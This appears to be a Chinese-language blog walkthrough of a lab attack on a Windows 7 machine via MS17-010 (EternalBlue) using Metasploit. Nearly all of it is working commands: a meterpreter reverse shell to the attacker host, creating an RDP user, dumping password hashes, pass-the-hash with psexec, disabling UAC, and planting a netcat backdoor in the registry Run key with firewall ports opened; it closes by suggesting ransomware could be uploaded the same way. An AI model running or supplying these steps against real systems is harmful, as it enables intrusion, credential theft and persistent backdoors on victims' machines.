題記
近期我打算把我腦子里面想了很久的需要實戰的東西都完成一遍,所以頻率會非常高,活到老,學到老。時間是檢驗真理的唯一標准。
環境
機器:kali(192.168.0.119)、win7(192.168.0.126)
Ctrl+shift+t在kali打開2個窗口。
一、探測目標是否存在此漏洞
1、使用探測模塊探測。
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.0.126
exploit
可以看到目標主機存在此漏洞。
二、漏洞利用
1、使用攻擊模塊
use exploit/windows/smb/ms17_010_eternalblue
Show options
2、瞄准目標
set RHOSTS 192.168.0.126
set payload windows/x64/meterpreter/reverse_tcp
show options
3、進行攻擊並拿下
set lhost 192.168.0.119
exploit
三、權限連接后留后門
1、創建一個新用戶來遠程連接win7桌面。
run post/windows/manage/enable_rdp
run post/windows/manage/enable_rdp username=goddess password=123.com
2、kali終端連接目標
rdesktop 192.168.0.126
然后就能用其他用戶登錄了。
3、關閉主機防護開啟后門
Windows密碼存放處:C:\Windows\System32\config\SAM
Linux密碼存放處:vim /etc/shadow
3.1Hashdump獲取密碼密文
goddess:1003:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::
3.2創建防火牆規則
Shell
netsh firewall add portopening TCP 4444 "goddess" enable all
exit退出
background把權限放到后台
3.3使用hash值登錄系統(遇到不會的就開show options看缺什么)
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set rhosts 192.168.0.126
set lhost 192.168.0.119
set SMBUser goddess
set SMBPass aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942
set SMBDomain WORKGROUP
exploit
4、meterpreter > getuid
5、下面我們配置一個后門程序,修改 UAC 的注冊表,需要重啟才能生效。
Shell
C:\Windows\System32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
重啟前留個后門。
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' 開機自啟,監聽端口為443
shell
防火牆允許 443 端口訪問網絡否則開機的時需要用戶點擊允許訪問網絡才可以成功執行。
C:\Windows\system32> netsh firewall add portopening TCP 443 "goddess" ENABLE ALL 重啟
shutdown -r -f -t 0
重啟后用戶登錄可以看到443開啟了
Kali使用nc監聽:nc -v 192.168.0.126 443
或者
6、擴展
可以像傳nc一樣上傳勒索病毒。
其他可參考文章
http://jianshu.com/p/2f31c453c70f